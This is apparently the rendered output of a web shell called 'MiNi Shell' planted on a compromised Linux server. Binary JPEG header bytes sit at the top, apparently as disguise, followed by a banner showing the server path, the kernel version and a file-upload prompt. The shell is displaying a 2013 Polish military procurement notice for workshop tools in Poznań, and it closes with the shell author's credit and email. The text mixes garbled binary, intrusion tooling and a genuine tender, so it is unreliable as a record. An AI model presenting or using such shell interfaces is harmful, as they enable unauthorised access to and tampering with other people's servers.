JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131023/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131023/431614-N-2013.html

<p class="kh_header"><b>Poznań: Przedmiotem zamówienia jest zakup urządzeń warsztatowych, narzędzi ręcznych           i elektronarzędzi do zabezpieczenia potrzeb 14 Wojskowego Oddziału Gospodarczego     w Poznaniu</b><br>
<b>Numer ogłoszenia: 431614 - 2013; data zamieszczenia: 23.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 14 Wojskowy Oddział Gospodarczy , ul. Bukowska 34, 60-811 Poznań, woj. wielkopolskie, tel. 61 857 48 02, faks 61 857 72 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.14wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zakup urządzeń warsztatowych, narzędzi ręcznych           i elektronarzędzi do zabezpieczenia potrzeb 14 Wojskowego Oddziału Gospodarczego     w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup urządzeń warsztatowych, narzędzi ręcznych  i elektronarzędzi do zabezpieczenia potrzeb 14 Wojskowego Oddziału Gospodarczego   w Poznaniu w ilościach i asortymencie wymienionym w załączniku nr 5 (5/1, 5/2, 5/3) do SIWZ    tj. formularzach cenowych oraz zgodnych z wymaganiami eksploatacyjno - technicznymi dotyczącymi przedmiotu zamówienia zawartymi w załączniku nr 6 do SIWZ. 

Zamawiający dopuszcza składanie ofert częściowych poprzez składanie ofert na poszczególne zadania. Za ofertę częściową uważa się ofertę obejmującą pełny asortyment danego zadania.

Liczba zadań 3:
Zadanie nr 1 - URZĄDZENIA WARSZTATOWE I ELEKTRONARZĘDZIA 
(m. in. ODSYSACZ DO SPALIN, SZLIFIERKA STOŁOWA DWUTARCZOWA 150, SZLIFIERKA STOŁOWA DWUTARCZOWA 250,
ZGRZEWARKA DO FOLII 500 MM, POLERKA DWUTARCZOWA Z PODSTAWĄ,SZLIFIERKA KĄTOWA 125,SZLIFIERKA KĄTOWA 115,WIERTARKA ELEKTRYCZNA UDAROWA DWUBIEGOWA,WIERTARKA ELEKTRYCZNA UDAROWA,  WIERTARKO WKRĘTARKA Z AKCESORIAMI, WIERTARKO - WKRĘTARKA, ODKURZACZ PRZEMYSŁOWY, ODKURZACZ PRZEMYSŁOWY NAKŁADANY,PROSTOWNIK DO ŁADOWANIA AKUMULATORÓW Z FUNKCJĄ ROZRUCHU, SPAWARKA INWERTOROWA, WYCINARKA ELEKTRYCZNA DO BLACHY,PISTOLET DO KLEJENIA,LAMPA PRZENOŚNA)

Zadanie nr 2 - NARZĘDZIA RĘCZNE 
(m. in. IMADŁO WARSZTATOWE ŚLUSARSKIE OBROTOWE 100,POJEMNIK WARSZTATOWY Z MOŻLIWOŚCIĄ SZTAPLOWANIA 157X101X74 NIEBIESKI,POJEMNIK WARSZTATOWY Z MOŻLIWOŚCIĄ SZTAPLOWANIA 224X144X108 NIEBIESKI,KLUCZ PŁASKI RWPd 10X12 DIN 3110,KLUCZ PŁASKI RWPd 12X13 DIN 3110,KLUCZ PŁASKI RWPd 13X17 DIN 3110,KLUCZ PŁASKI RWPd 14X17 DIN 3110,KLUCZ PŁASKI RWPd 17X19 DIN 3110,KLUCZ PŁASKI RWPd 19X22 DIN 3110,KLUCZ PŁASKI RWPd 22X24 DIN 3110,KLUCZ PŁASKI RWPd 27X30 DIN 3110,KLUCZ PŁASKI RWPd 36X41 DIN 3110,SZCZYPCE UNIWERSALNE 200 RSUa (ramiona w okładzinie PCV) DIN 5746,SZCZYPCE UNIWERSALNE 180 RSUa (ramiona w okładzinie PCV) DIN 5746,SZCZYPCE UNIWERSALNE 160 RSUa (ramiona w okładzinie PCV) DIN 5746,SZCZYPCE PŁASKI WYDŁUŻONE 160 RSPb (ramiona w okładzinie PCV) DIN 5745,WKRĘTAK PŁASKI Z ZABIERAKIEM 0,8x4,0x100/150 mm, WKRĘTAK PŁASKI Z ZABIERAKIEM 0,8x5,5x165/175 mm,WKRĘTAK PŁASKI Z ZABIERAKIEM 1,2x8,0x230/250 mm , WKRĘTAK KRZYŻAKOWY PH 2 100/210 mm,
WKRĘTAK KRZYŻAKOWY PH 3  150/270 mm, ŁYŻKA DO OPON 500 - 530 MM, KLUCZ NASADOWY DWUSTRONNY SZEŚCIOKĄTNY RSWd 19X22 (z przetyczką), KLUCZ NASADOWY DWUSTRONNY SZEŚCIOKĄTNY RSWd 22X24 (z przetyczką),KLUCZ DO NAKRĘTEK KÓŁ FAJKOWY P-22,PRZEBIJAK BLACHARSKI OKRĄGŁY RDPd O 4 ,KLUCZ ROZSUWALNY GŁÓWKOWY 41 DIN 3117,

Zadanie nr 3-URZĄDZENIE DIAGNOSTYCZNE DO POJAZDÓW OSOBOWYCH, DOSTAWCZYCH I CIĘŻAROWYCH szt. 1

Zamawiający dopuszcza możliwość zwiększenia ilości asortymentu będącego przedmiotem zamówienia (umowy) w poszczególnych zadaniach w ramach prawa opcji według poniższego opisu:
a)zadanie nr 1 o kwotę  13 530,00 zł brutto;
b)zadanie nr 2 o kwotę  18 450,00 zł brutto;
realizacja zamówienia (dostawa towaru wraz z fakturą) w ramach prawa opcji musi być zrealizowana najpóźniej do dnia 20 grudnia 2013 r.
12)	Wymagany termin realizacji zamówienia - Realizacja zamówienia podstawowego nastąpi   w terminie od dnia podpisania umowy do 06 grudnia 2013r. Realizacja zamówienia w ramach prawa opcji nastąpi do dnia 20 grudnia 2013 roku lub wyczerpania kwoty z umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 31.20.00.00-8, 38.90.00.00-4, 42.65.20.00-1, 42.90.00.00-5, 39.15.10.00-5, 42.10.00.00-0, 44.40.00.00-4, 44.51.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający wymaga złożenia oświadczenia zgodnie z zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wybrany wykonawca zobowiązany będzie do dostarczenia wraz z dostawą niżej wymienione dokumenty dla poszczególnych towarów zgodnie z opisem zawartym w wymaganiach eksploatacyjno - technicznych zawartych w załączniku nr 6 do SIWZ):
a) Wykonawca zobowiązany jest dostarczyć do każdego przedmiotu zamówienia (jeżeli występuje) oryginalną dokumentację techniczną, instrukcję użytkowania oraz kopię certyfikatu zgodności lub deklarację zgodności. Dostarczone dokumenty muszą być w języku polskim;
b) Wykonawca zobowiązany jest dostarczyć karty gwarancyjne:
na wyroby identyfikowalne (posiadające nr seryjne lub inne cechy identyfikowalności). Dostarczone karty gwarancyjne muszą zawierać informację o warunkach udzielonej gwarancji i o sposobie postępowania w przypadku konieczności uruchomienia procedury gwarancyjnej.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi zawierać:
a)formularz oferty, stanowiący załącznik nr 1 do SIWZ,
b)formularz cenowy, stanowiący załącznik nr 5  (5/1- zadanie 1; 5/2 - zadanie 2; 5/3 - zadanie 3) do SIWZ,
c)dokumenty i oświadczenia wymienione w rozdziale VI SIWZ,
d)pełnomocnictwo w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia  o wpisie do ewidencji działalności gospodarczej,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zostały określone w projekcie umowy.       
2.W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl oraz www.14wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 14 Wojskowy Oddział Gospodarczy ul. Bukowska 34, 60-811 Poznań - Sekcja Zamówień Publicznych: budynek nr 5, wejście C, pokój 6-7, od pon-pt w godz. 8.00-15.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2013 godzina 10:00, miejsce: 14 Wojskowy Oddział Gospodarczy ul. Bukowska 34, 60-811 Poznań- Kancelaria Jawna: budynek nr 2, pokój 17A - parter, od pon-pt w godz. 8.00-11.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 -      URZĄDZENIA WARSZTATOWE I ELEKTRONARZĘDZIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup urządzeń warsztatowych i elektronarzędzi ( m. in. ODSYSACZ DO SPALIN ,SZLIFIERKA STOŁOWA DWUTARCZOWA 150,SZLIFIERKA STOŁOWA DWUTARCZOWA 250,ZGRZEWARKA DO FOLII 500 MM, POLERKA DWUTARCZOWA Z PODSTAWĄ,SZLIFIERKA KĄTOWA 125,
SZLIFIERKA KĄTOWA 115,WIERTARKA ELEKTRYCZNA UDAROWA DWUBIEGOWA,WIERTARKA ELEKTRYCZNA UDAROWA,  WIERTARKO WKRĘTARKA Z AKCESORIAMI ,WIERTARKO - WKRĘTARKA ,
ODKURZACZ PRZEMYSŁOWY ,ODKURZACZ PRZEMYSŁOWY NAKŁADANY,PROSTOWNIK DO ŁADOWANIA AKUMULATORÓW Z FUNKCJĄ ROZRUCHU, SPAWARKA INWERTOROWA ,WYCINARKA ELEKTRYCZNA DO BLACHY,
PISTOLET DO KLEJENIA,LAMPA PRZENOŚNA) do zabezpieczenia potrzeb 14 Wojskowego Oddziału Gospodarczego   w Poznaniu w ilościach i asortymencie wymienionym w załączniku nr 5 (5/1, 5/2, 5/3) do SIWZ   tj. formularzach cenowych oraz zgodnych z wymaganiami eksploatacyjno - technicznymi dotyczącymi przedmiotu zamówienia zawartymi w załączniku nr 6 do SIWZ. 

     Zamawiający dopuszcza możliwość zwiększenia ilości asortymentu będącego przedmiotem zamówienia (umowy) w poszczególnych zadaniach w ramach prawa opcji według poniższego opisu:
a)	zadanie nr 1 o kwotę  13 530,00 zł brutto;
realizacja zamówienia (dostawa towaru wraz z fakturą) w ramach prawa opcji musi być zrealizowana najpóźniej do dnia 20 grudnia 2013 r.
Wymagany termin realizacji zamówienia - Realizacja zamówienia podstawowego nastąpi w terminie od dnia podpisania umowy do 06 grudnia 2013r
Realizacja zamówienia w ramach prawa opcji nastąpi do dnia 20 grudnia 2013 roku lub wyczerpania kwoty z umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.20.00.00-8, 38.90.00.00-4, 42.65.20.00-1, 42.90.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NARZĘDZIA RĘCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup narzędzi ręcznych (m. in. KLUCZ PŁASKI RWPd 19X22 DIN 3110,KLUCZ PŁASKI RWPd 22X24 DIN 3110,KLUCZ PŁASKI RWPd 27X30 DIN 3110,KLUCZ PŁASKI RWPd 36X41 DIN 3110,SZCZYPCE UNIWERSALNE 200 RSUa (ramiona w okładzinie PCV) DIN 5746,SZCZYPCE UNIWERSALNE 160 RSUa (ramiona w okładzinie PCV) DIN 5746,SZCZYPCE PŁASKI WYDŁUŻONE 160 RSPb (ramiona w okładzinie PCV) DIN 5745,WKRĘTAK PŁASKI Z ZABIERAKIEM 0,8x4,0x100/150 mm,  WKRĘTAK PŁASKI Z ZABIERAKIEM 1,2x8,0x230/250 mm, WKRĘTAK KRZYŻAKOWY PH 2 100/210 mm, PODNOŚNIK HYDRAULICZNY TELESKOPOWY 2,5 T,PRASA HYDRAULICZNA STOŁOWA 10 T,DRABINA MAGAZYNOWA PRZEJEZDNA 1500 MM,LAMPA WARSZTATOWA Z LUPĄ I OŚWIETLENIEM ,
ZESTAW NARZYNEK I GWINTOWNIKÓW HSS,ZESTAW KLUCZY NASADOWYCH SZEŚCIOKĄTNYCH 1/2) do zabezpieczenia potrzeb 14 Wojskowego Oddziału Gospodarczego w Poznaniu w ilościach i asortymencie wymienionym w załączniku nr 5 (5/1, 5/2, 5/3) do SIWZ tj. formularzach cenowych oraz zgodnych z wymaganiami eksploatacyjno - technicznymi dotyczącymi przedmiotu zamówienia zawartymi w załączniku nr 6 do SIWZ. 


Zamawiający dopuszcza możliwość zwiększenia ilości asortymentu będącego przedmiotem zamówienia (umowy) w poszczególnych zadaniach w ramach prawa opcji według poniższego opisu a)zadanie nr 2 o kwotę  18 450,00 zł brutto; realizacja zamówienia (dostawa towaru wraz z fakturą) w ramach prawa opcji musi być zrealizowana najpóźniej do dnia 20 grudnia 2013 r.Wymagany termin realizacji zamówienia - Realizacja zamówienia podstawowego nastąpi w terminie od dnia podpisania umowy do 06 grudnia 2013r. Realizacja zamówienia w ramach prawa opcji nastąpi do dnia 20 grudnia 2013 roku lub wyczerpania kwoty z umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.10.00-5, 42.10.00.00-0, 44.40.00.00-4, 44.51.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> URZĄDZENIE DIAGNOSTYCZNE DO POJAZDÓW OSOBOWYCH, DOSTAWCZYCH I CIĘŻAROWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup URZĄDZENIA DIAGNOSTYCZNEGO szt 1  do zabezpieczenia potrzeb 14 Wojskowego Oddziału Gospodarczego w Poznaniu w ilościach i asortymencie wymienionym w załączniku nr 5 (5/1, 5/2, 5/3) do SIWZ   tj. formularzach cenowych oraz zgodnych z wymaganiami eksploatacyjno - technicznymi dotyczącymi przedmiotu zamówienia zawartymi w załączniku nr 6 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.90.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com